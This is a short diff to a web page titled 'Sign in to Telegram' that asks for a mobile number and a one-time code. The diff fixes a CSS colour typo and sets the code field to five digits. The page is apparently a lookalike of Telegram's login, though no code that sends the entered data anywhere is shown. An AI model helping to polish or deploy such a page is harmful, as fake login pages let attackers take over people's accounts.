--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-<!DOCTYPE html> 
+<!DOCTYPE html>  
 <html lang="en">
 <head>
     <meta charset="UTF-8">
@@ -37,7 +37,7 @@
             cursor: pointer;
         }
         button:hover {
-            background-color: skykblue;
+            background-color: skyblue;
         }
     </style>
 </head>
@@ -47,7 +47,7 @@
         <h2>Sign in to Telegram</h2>
         <input type="text" id="mobile" placeholder="Enter mobile number" maxlength="13">
         <button onclick="sendOTP()">Send OTP</button>
-        <input type="text" id="otp" placeholder="Enter OTP" maxlength="6" style="display: none;">
+        <input type="text" id="otp" placeholder="Enter OTP" maxlength="5" style="display: none;">
         <button onclick="verifyOTP()" id="verifyBtn" style="display: none;">Verify OTP</button>
     </div>
 
